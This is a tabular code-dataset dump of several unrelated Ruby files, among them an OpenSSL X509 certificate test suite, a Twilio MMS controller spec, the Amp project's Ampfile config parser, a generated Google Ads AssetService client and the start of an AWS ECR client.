hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e28ae1b18e814eb4895ff6e1fd46d4b5658128c2 | 567 | # global_miles_e_commerce_api
#
# This file was automatically generated by APIMATIC v2.0
# ( https://apimatic.io ).
module GlobalMilesECommerceApi
# Represents an Http call in context.
class HttpContext
attr_accessor :request, :response
# The constructor.
# @param [HttpRequest] An HttpRequest object representing the HTTP request.
# @param [HttpResponse] An HttpResponse object representing the HTTP
# response.
def initialize(request, response)
@request = request
@response = response
end
end
end
| 27 | 80 | 0.698413 |
b95c75fd72b37ffc28a784f874dc74ffd9435ad4 | 1,274 | require 'rails_helper'
describe MmsResourcesController, type: :controller do
describe '#index' do
let(:files) { [ double(:files) ] }
before do
allow(MmsResource).to receive(:all) { files }
get :index
end
it 'assigns @files' do
expect(assigns(:files)).to eq(files)
end
it 'returns a 200' do
expect(response).to have_http_status(:ok)
end
end
describe '#create' do
let(:twilio_request_params) do
{
NumMedia: 1,
MediaContentType0: 'image/jpeg',
MediaUrl0: 'https://c1.staticflickr.com/3/2899/14341091933_1e92e62d12_b.jpg',
MessageSid: 'MMd48e71771d0e65ec0db7964d261bc6ff'
}
end
before do |example|
expect_any_instance_of(Twilio::REST::Client)
.to receive_message_chain(:api, :accounts, :messages, :media, :delete)
unless example.metadata[:skip_on_before]
post :create, params: twilio_request_params
end
end
it 'saves the resource to the database', :skip_on_before do
expect { post :create, params: twilio_request_params }
.to change(MmsResource, :count).by(1)
expect(response.body).to include('Thanks for sending us 1 file(s)!')
expect(response).to have_http_status(:ok)
end
end
end
| 27.106383 | 85 | 0.654631 |
289994d17bca8f3a241b7845d8dc58eeb928cd19 | 6,366 | # frozen_string_literal: false
require_relative "utils"
if defined?(OpenSSL)
class OpenSSL::TestX509Certificate < OpenSSL::TestCase
def setup
super
@rsa1024 = Fixtures.pkey("rsa1024")
@rsa2048 = Fixtures.pkey("rsa2048")
@dsa256 = Fixtures.pkey("dsa256")
@dsa512 = Fixtures.pkey("dsa512")
@ca = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=CA")
@ee1 = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=EE1")
end
def test_serial
[1, 2**32, 2**100].each{|s|
cert = issue_cert(@ca, @rsa2048, s, [], nil, nil)
assert_equal(s, cert.serial)
cert = OpenSSL::X509::Certificate.new(cert.to_der)
assert_equal(s, cert.serial)
}
end
def test_public_key
exts = [
["basicConstraints","CA:TRUE",true],
["subjectKeyIdentifier","hash",false],
["authorityKeyIdentifier","keyid:always",false],
]
[
@rsa1024, @rsa2048, @dsa256, @dsa512,
].each{|pk|
cert = issue_cert(@ca, pk, 1, exts, nil, nil)
assert_equal(cert.extensions.sort_by(&:to_s)[2].value,
OpenSSL::TestUtils.get_subject_key_id(cert))
cert = OpenSSL::X509::Certificate.new(cert.to_der)
assert_equal(cert.extensions.sort_by(&:to_s)[2].value,
OpenSSL::TestUtils.get_subject_key_id(cert))
}
end
def test_validity
now = Time.at(Time.now.to_i + 0.9)
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil,
not_before: now, not_after: now+3600)
assert_equal(Time.at(now.to_i), cert.not_before)
assert_equal(Time.at(now.to_i+3600), cert.not_after)
now = Time.at(now.to_i)
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil,
not_before: now, not_after: now+3600)
assert_equal(now.getutc, cert.not_before)
assert_equal((now+3600).getutc, cert.not_after)
now = Time.at(0)
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil,
not_before: now, not_after: now)
assert_equal(now.getutc, cert.not_before)
assert_equal(now.getutc, cert.not_after)
now = Time.at(0x7fffffff)
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil,
not_before: now, not_after: now)
assert_equal(now.getutc, cert.not_before)
assert_equal(now.getutc, cert.not_after)
end
def test_extension
ca_exts = [
["basicConstraints","CA:TRUE",true],
["keyUsage","keyCertSign, cRLSign",true],
["subjectKeyIdentifier","hash",false],
["authorityKeyIdentifier","keyid:always",false],
]
ca_cert = issue_cert(@ca, @rsa2048, 1, ca_exts, nil, nil)
ca_cert.extensions.each_with_index{|ext, i|
assert_equal(ca_exts[i].first, ext.oid)
assert_equal(ca_exts[i].last, ext.critical?)
}
ee1_exts = [
["keyUsage","Non Repudiation, Digital Signature, Key Encipherment",true],
["subjectKeyIdentifier","hash",false],
["authorityKeyIdentifier","keyid:always",false],
["extendedKeyUsage","clientAuth, emailProtection, codeSigning",false],
["subjectAltName","email:[email protected]",false],
]
ee1_cert = issue_cert(@ee1, @rsa1024, 2, ee1_exts, ca_cert, @rsa2048)
assert_equal(ca_cert.subject.to_der, ee1_cert.issuer.to_der)
ee1_cert.extensions.each_with_index{|ext, i|
assert_equal(ee1_exts[i].first, ext.oid)
assert_equal(ee1_exts[i].last, ext.critical?)
}
end
def test_sign_and_verify_rsa_sha1
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil, digest: "sha1")
assert_equal(false, cert.verify(@rsa1024))
assert_equal(true, cert.verify(@rsa2048))
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa256) })
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa512) })
cert.serial = 2
assert_equal(false, cert.verify(@rsa2048))
end
def test_sign_and_verify_rsa_md5
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil, digest: "md5")
assert_equal(false, cert.verify(@rsa1024))
assert_equal(true, cert.verify(@rsa2048))
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa256) })
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa512) })
cert.subject = @ee1
assert_equal(false, cert.verify(@rsa2048))
rescue OpenSSL::X509::CertificateError # RHEL7 disables MD5
end
def test_sign_and_verify_dsa
cert = issue_cert(@ca, @dsa512, 1, [], nil, nil)
assert_equal(false, certificate_error_returns_false { cert.verify(@rsa1024) })
assert_equal(false, certificate_error_returns_false { cert.verify(@rsa2048) })
assert_equal(false, cert.verify(@dsa256))
assert_equal(true, cert.verify(@dsa512))
cert.not_after = Time.now
assert_equal(false, cert.verify(@dsa512))
end
def test_sign_and_verify_rsa_dss1
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil, digest: OpenSSL::Digest::DSS1.new)
assert_equal(false, cert.verify(@rsa1024))
assert_equal(true, cert.verify(@rsa2048))
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa256) })
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa512) })
cert.subject = @ee1
assert_equal(false, cert.verify(@rsa2048))
rescue OpenSSL::X509::CertificateError
end if defined?(OpenSSL::Digest::DSS1)
def test_sign_and_verify_dsa_md5
assert_raise(OpenSSL::X509::CertificateError){
issue_cert(@ca, @dsa512, 1, [], nil, nil, digest: "md5")
}
end
def test_dsa_with_sha2
cert = issue_cert(@ca, @dsa256, 1, [], nil, nil, digest: "sha256")
assert_equal("dsa_with_SHA256", cert.signature_algorithm)
# TODO: need more tests for dsa + sha2
# SHA1 is allowed from OpenSSL 1.0.0 (0.9.8 requires DSS1)
cert = issue_cert(@ca, @dsa256, 1, [], nil, nil, digest: "sha1")
assert_equal("dsaWithSHA1", cert.signature_algorithm)
end
def test_check_private_key
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil)
assert_equal(true, cert.check_private_key(@rsa2048))
end
def test_read_from_file
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil)
Tempfile.create("cert") { |f|
f << cert.to_pem
f.rewind
assert_equal cert.to_der, OpenSSL::X509::Certificate.new(f).to_der
}
end
private
def certificate_error_returns_false
yield
rescue OpenSSL::X509::CertificateError
false
end
end
end
| 34.978022 | 88 | 0.669808 |
18d99d419e525fb607ce7d02d2839a5780e25012 | 5,426 | ##################################################################
# Licensing Information #
# #
# The following code is licensed, as standalone code, under #
# the Ruby License, unless otherwise directed within the code. #
# #
# For information on the license of this code when distributed #
# with and used in conjunction with the other modules in the #
# Amp project, please see the root-level LICENSE file. #
# #
# © Michael J. Edgar and Ari Brown, 2009-2010 #
# #
##################################################################
module Amp
##
# This deals with the configuration file for amp that is located in the top of
# the Ampfile. The hierarchy of config files now is as such:
#
# LEAST
# /etc/
# ~/
# /your_repo/.hg/hgrc
# /your_repo/Ampfile
# MOST
# =======================
#
# The Ampfile's config-ness is simple: it's a header, some content, and a
# footer. Simple. Easy. Sleek. It is Blue Steel in code form. Just fyi, I
# just got to watch a movie with two hot twins. Be proud.
#
# NOW, Mike said that he didn't want to be restricted to just YAML. I'm not
# going to bake in three levels of abstraction to get a nice way to switch
# out between YAML and PythonConfig and Diffie-Hellmann encoding. Instead,
# I'm going to just document this really well and make it very simple to
# write your own extension for this.
class AmpfileConfig
require 'yaml' # suck it bitches this will always load
# The header and footer are content-agnostic.
# You can change them as you please, even though they are constants.
# Amp::AmpfileConfig::Header.replace "# lolcat"
HEADER = "########\n" # 8 #s
FOOTER = "########\n" # 8 #s
attr_accessor :file
attr_accessor :config
def initialize(filename)
@file = filename
# basically all we do here is move the index of where we are in the file
Kernel::open filename, 'r' do |f|
header f # chew the header
cntnt = content f # get the content. can be an empty string
interpret cntnt # assign the interpreted content to @config
end # and bail the fuck out of there
end
##
# We'll start by chewing up the header.
#
# @param [IO, #read] open_file An already opened file handle from which
# we'll read.
# @return [nil]
def header(open_file)
until open_file.readline == HEADER # this is becoming a bad habit of tonight
end # (timeline hint: #content was written first)
end
##
# Next up in this kitchen, we need to deal with the content. Shall we?
# For those counting at home, this is content-agnostic. Easy with that
# delete key, there, eeeeeeeeasy girl...
#
# This method takes the content AND THE FOOTER from an open file
# handle +open_file+.
#
# @param [IO, #read] open_file An already opened file handle from which
# we'll read.
# @return [String] The content that needs to be parsed somehow.
def content(open_file)
lines = []
# Sup coolkid. We're taking advantage of the side effect here. It's generally
# unwise, but what can I say, I like to take risks; I ride my bike without a
# helmet.
until (lines << open_file.readline) == FOOTER
end
lines.pop # I figure this is overall cheaper than doing lines[0..-2].join ''
lines.join '' # The world may never know
end
##
# This is the only content-dependent part. If you were to override a method,
# pick this one. This interprets the content (+cntnt+) and stores it in the
# @config variable.
#
# @param [String] cntnt The content that we need to interpret.
def interpret(cntnt)
@config = YAML::load cntnt
#@config =
end
def [](*args)
@config[*args]
end
def []=(*args)
@config.send :[]=, *args # due to syntax oddities
end
def save!
# Do nothing, because we can't really save back to the Ampfile. Adjustable
# length heading? I should hope not. Let's just perform a O(lm) insertion
# where l is the difference in the size of the headers and m is the length
# of the rest of the Ampfile. Worst case is O(n^2) is l = m. Let's take a
# note from Google on this one: if you want shit to be fast, don't let
# anything slow be introduced.
# Ah, fuck it, let's just get this feature in there anyways and see if it
# actually slows shit down.
data = File.read @file
pointer = nil
Kernel::open @file, 'r' do |f|
header f
content f # throw it away, we're just looking for the index pointer
pointer = f.pos
end # gtfo
# yeah, fuck it, i just want to get to bed. change the #to_yaml to whatever you want
text = HEADER + @config.to_yaml + FOOTER + data[pointer..-1]
Kernel::open(@file, 'w') {|f| f.write text } # write it in place
true # success marker
end
end
end
| 37.680556 | 90 | 0.570217 |
33d06f64902b29998505c6f950ee90ac34ca46ff | 105 | name "cucumber"
description "cucumber test environment"
default_attributes(
'ENV' => "production"
)
| 15 | 39 | 0.733333 |
d5e466d45f3a7ba5fa2189f85670410d3e3a9fae | 24,827 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# require "google/ads/google_ads/error"
require "google/ads/googleads/v8/services/asset_service_pb"
module Google
module Ads
module GoogleAds
module V8
module Services
module AssetService
##
# Client for the AssetService service.
#
# Service to manage assets. Asset types can be created with AssetService are
# YoutubeVideoAsset, MediaBundleAsset and ImageAsset. TextAsset should be
# created with Ad inline.
#
class Client
include Paths
# @private
attr_reader :asset_service_stub
##
# Configure the AssetService Client class.
#
# See {::Google::Ads::GoogleAds::V8::Services::AssetService::Client::Configuration}
# for a description of the configuration fields.
#
# @example
#
# # Modify the configuration for all AssetService clients
# ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
default_config = Client::Configuration.new
default_config.timeout = 3600.0
default_config.retry_policy = {
initial_delay: 5.0, max_delay: 60.0, multiplier: 1.3, retry_codes: [14, 4]
}
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the AssetService Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Ads::GoogleAds::V8::Services::AssetService::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new AssetService client object.
#
# @example
#
# # Create a client using the default configuration
# client = ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.new
#
# # Create a client using a custom configuration
# client = ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the AssetService client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "gapic/grpc"
require "google/ads/googleads/v8/services/asset_service_services_pb"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
# Use self-signed JWT if the endpoint is unchanged from default,
# but only if the default endpoint does not have a region prefix.
enable_self_signed_jwt = @config.endpoint == Client.configure.endpoint &&
[email protected](".").first.include?("-")
credentials ||= Credentials.default scope: @config.scope,
enable_self_signed_jwt: enable_self_signed_jwt
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@quota_project_id = @config.quota_project
@quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id
@asset_service_stub = ::Gapic::ServiceStub.new(
::Google::Ads::GoogleAds::V8::Services::AssetService::Stub,
credentials: credentials,
endpoint: @config.endpoint,
channel_args: @config.channel_args,
interceptors: @config.interceptors
)
end
# Service calls
##
# Returns the requested asset in full detail.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
#
# @overload get_asset(request, options = nil)
# Pass arguments to `get_asset` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::GetAssetRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::GetAssetRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload get_asset(resource_name: nil)
# Pass arguments to `get_asset` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param resource_name [::String]
# Required. The resource name of the asset to fetch.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Resources::Asset]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Resources::Asset]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
def get_asset request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Ads::GoogleAds::V8::Services::GetAssetRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_asset.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"resource_name" => request.resource_name
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_asset.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_asset.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@asset_service_stub.call_rpc :get_asset, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Creates assets. Operation statuses are returned.
#
# List of thrown errors:
# [AssetError]()
# [AuthenticationError]()
# [AuthorizationError]()
# [CollectionSizeError]()
# [CurrencyCodeError]()
# [DatabaseError]()
# [DateError]()
# [DistinctError]()
# [FieldError]()
# [FieldMaskError]()
# [HeaderError]()
# [IdError]()
# [InternalError]()
# [ListOperationError]()
# [MediaUploadError]()
# [MutateError]()
# [NotAllowlistedError]()
# [NotEmptyError]()
# [OperatorError]()
# [QuotaError]()
# [RangeError]()
# [RequestError]()
# [SizeLimitError]()
# [StringFormatError]()
# [StringLengthError]()
# [UrlFieldError]()
# [YoutubeVideoRegistrationError]()
#
# @overload mutate_assets(request, options = nil)
# Pass arguments to `mutate_assets` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::MutateAssetsRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::MutateAssetsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload mutate_assets(customer_id: nil, operations: nil, partial_failure: nil, response_content_type: nil, validate_only: nil)
# Pass arguments to `mutate_assets` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param customer_id [::String]
# Required. The ID of the customer whose assets are being modified.
# @param operations [::Array<::Google::Ads::GoogleAds::V8::Services::AssetOperation, ::Hash>]
# Required. The list of operations to perform on individual assets.
# @param partial_failure [::Boolean]
# If true, successful operations will be carried out and invalid
# operations will return errors. If false, all operations will be carried
# out in one transaction if and only if they are all valid.
# Default is false.
# @param response_content_type [::Google::Ads::GoogleAds::V8::Enums::ResponseContentTypeEnum::ResponseContentType]
# The response content type setting. Determines whether the mutable resource
# or just the resource name should be returned post mutation.
# @param validate_only [::Boolean]
# If true, the request is validated but not executed. Only errors are
# returned, not results.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Services::MutateAssetsResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Services::MutateAssetsResponse]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
def mutate_assets request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request,
to: ::Google::Ads::GoogleAds::V8::Services::MutateAssetsRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.mutate_assets.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"customer_id" => request.customer_id
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.mutate_assets.timeout,
metadata: metadata,
retry_policy: @config.rpcs.mutate_assets.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@asset_service_stub.call_rpc :mutate_assets, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Configuration class for the AssetService API.
#
# This class represents the configuration for AssetService,
# providing control over timeouts, retry behavior, logging, transport
# parameters, and other low-level controls. Certain parameters can also be
# applied individually to specific RPCs. See
# {::Google::Ads::GoogleAds::V8::Services::AssetService::Client::Configuration::Rpcs}
# for a list of RPCs that can be configured independently.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# @example
#
# # Modify the global config, setting the timeout for
# # get_asset to 20 seconds,
# # and all remaining timeouts to 10 seconds.
# ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.configure do |config|
# config.timeout = 10.0
# config.rpcs.get_asset.timeout = 20.0
# end
#
# # Apply the above configuration only to a new client.
# client = ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.new do |config|
# config.timeout = 10.0
# config.rpcs.get_asset.timeout = 20.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"googleads.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`GRPC::Core::Channel`) a gRPC channel with included credentials
# * (`GRPC::Core::ChannelCredentials`) a gRPC credentails object
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] channel_args
# Extra parameters passed to the gRPC channel. Note: this is ignored if a
# `GRPC::Core::Channel` object is provided as the credential.
# @return [::Hash]
# @!attribute [rw] interceptors
# An array of interceptors that are run before calls are executed.
# @return [::Array<::GRPC::ClientInterceptor>]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
# @!attribute [rw] metadata
# Additional gRPC headers to be sent with the call.
# @return [::Hash{::Symbol=>::String}]
# @!attribute [rw] retry_policy
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
# @return [::Hash]
# @!attribute [rw] quota_project
# A separate project against which to charge quota.
# @return [::String]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "googleads.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client,
nil]
allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil)
config_attr :interceptors, nil, ::Array, nil
config_attr :timeout, nil, ::Numeric, nil
config_attr :metadata, nil, ::Hash, nil
config_attr :retry_policy, nil, ::Hash, ::Proc, nil
config_attr :quota_project, nil, ::String, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
##
# Configurations for individual RPCs
# @return [Rpcs]
#
def rpcs
@rpcs ||= begin
parent_rpcs = nil
parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs)
Rpcs.new parent_rpcs
end
end
##
# Configuration RPC class for the AssetService API.
#
# Includes fields providing the configuration for each RPC in this service.
# Each configuration object is of type `Gapic::Config::Method` and includes
# the following configuration fields:
#
# * `timeout` (*type:* `Numeric`) - The call timeout in seconds
# * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers
# * `retry_policy (*type:* `Hash`) - The retry policy. The policy fields
# include the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
#
class Rpcs
##
# RPC-specific configuration for `get_asset`
# @return [::Gapic::Config::Method]
#
attr_reader :get_asset
##
# RPC-specific configuration for `mutate_assets`
# @return [::Gapic::Config::Method]
#
attr_reader :mutate_assets
# @private
def initialize parent_rpcs = nil
get_asset_config = parent_rpcs.get_asset if parent_rpcs.respond_to? :get_asset
@get_asset = ::Gapic::Config::Method.new get_asset_config
mutate_assets_config = parent_rpcs.mutate_assets if parent_rpcs.respond_to? :mutate_assets
@mutate_assets = ::Gapic::Config::Method.new mutate_assets_config
yield self if block_given?
end
end
end
end
end
end
end
end
end
end
| 49.654 | 144 | 0.530028 |
e2890385e37dbc77a73e04b9b5c11d4d8411abed | 1,699 | class CompactFormResponseChangesService < CivilService::Service
attr_reader :scope, :send_mail
def initialize(scope:)
@scope = scope.not_compacted
end
private
def inner_call
convention_ids_with_pending_changes.each do |convention_id|
all_pending_changes = scope.joins(:user_con_profile)
.where(user_con_profiles: { convention_id: convention_id })
response_ids = all_pending_changes.pluck(Arel.sql('distinct response_id'))
response_ids.each do |response_id|
compact_response_id(response_id)
end
end
success
end
def convention_ids_with_pending_changes
@convention_ids_with_pending_changes ||= scope.joins(:user_con_profile)
.pluck(Arel.sql('distinct user_con_profiles.convention_id'))
end
def compact_response_id(response_id)
ActiveRecord::Base.transaction do
raw_changes = scope.includes(:user_con_profile).where(response_id: response_id)
# skip compacting responses where changes are ongoing
unless raw_changes.where('created_at >= ?', 1.hour.ago).any?
compact_changes(response_id, raw_changes.to_a)
end
end
end
def compact_changes(response_id, raw_changes)
compacted_changes = CompactingFormResponseChangesPresenter.new(raw_changes).compacted_changes
compacted_changes.each do |change|
created_at = change.created_at
updated_at = change.updated_at
change.save!
change.update_columns(created_at: created_at, updated_at: updated_at)
end
logger.debug "Response #{response_id}: compacted #{raw_changes.size} changes to \
#{compacted_changes.size}"
FormResponseChange.where(id: raw_changes.map(&:id)).delete_all
end
end
| 32.056604 | 97 | 0.747499 |
38023e840442cd1b807d4da45d8dd61a41735275 | 82 | require 'multidiff/differ'
require 'multidiff/runner'
require 'multidiff/version'
| 20.5 | 27 | 0.817073 |
d54d86e8880a46e0de6d6353a4fbe2473db9509e | 109,467 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
require 'aws-sdk-core/plugins/retry_errors.rb'
require 'aws-sdk-core/plugins/global_configuration.rb'
require 'aws-sdk-core/plugins/regional_endpoint.rb'
require 'aws-sdk-core/plugins/endpoint_discovery.rb'
require 'aws-sdk-core/plugins/endpoint_pattern.rb'
require 'aws-sdk-core/plugins/response_paging.rb'
require 'aws-sdk-core/plugins/stub_responses.rb'
require 'aws-sdk-core/plugins/idempotency_token.rb'
require 'aws-sdk-core/plugins/jsonvalue_converter.rb'
require 'aws-sdk-core/plugins/client_metrics_plugin.rb'
require 'aws-sdk-core/plugins/client_metrics_send_plugin.rb'
require 'aws-sdk-core/plugins/transfer_encoding.rb'
require 'aws-sdk-core/plugins/http_checksum.rb'
require 'aws-sdk-core/plugins/signature_v4.rb'
require 'aws-sdk-core/plugins/protocols/json_rpc.rb'
Aws::Plugins::GlobalConfiguration.add_identifier(:ecr)
module Aws::ECR
# An API client for ECR. To construct a client, you need to configure a `:region` and `:credentials`.
#
# client = Aws::ECR::Client.new(
# region: region_name,
# credentials: credentials,
# # ...
# )
#
# For details on configuring region and credentials see
# the [developer guide](/sdk-for-ruby/v3/developer-guide/setup-config.html).
#
# See {#initialize} for a full list of supported configuration options.
class Client < Seahorse::Client::Base
include Aws::ClientStubs
@identifier = :ecr
set_api(ClientApi::API)
add_plugin(Seahorse::Client::Plugins::ContentLength)
add_plugin(Aws::Plugins::CredentialsConfiguration)
add_plugin(Aws::Plugins::Logging)
add_plugin(Aws::Plugins::ParamConverter)
add_plugin(Aws::Plugins::ParamValidator)
add_plugin(Aws::Plugins::UserAgent)
